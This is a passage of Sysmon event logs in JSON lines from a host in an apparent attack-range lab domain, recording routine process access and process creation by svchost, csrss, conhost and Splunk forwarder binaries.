C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3228,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3229,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3230,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D7590500}\r\nTargetProcessId: 4840\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D7590500}","TargetProcessId":"4840","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3231,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.702\r\nProcessGuid: {E2A3D6B1-10FF-5F25-0000-00109A5A0500}\r\nProcessId: 5032\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-10FF-5F25-0000-0010D7590500}\r\nParentProcessId: 4840\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  web list settings --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.702","ProcessGuid":"{E2A3D6B1-10FF-5F25-0000-00109A5A0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-10FF-5F25-0000-0010D7590500}","ParentProcessId":"4840","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  web list settings --no-log","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3232,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-10FF-5F25-0000-0010D7590500}\r\nSourceProcessId: 4840\r\nSourceThreadId: 4860\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00109A5A0500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-10FF-5F25-0000-0010D7590500}","SourceProcessId":"4840","SourceThreadId":"4860","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00109A5A0500}","TargetProcessId":"5032","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3233,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10FF-5F25-0000-00109A5A0500}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10FF-5F25-0000-00109A5A0500}","TargetProcessId":"5032","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3234,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3235,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:43.690","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:43","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3236,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:43.690\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 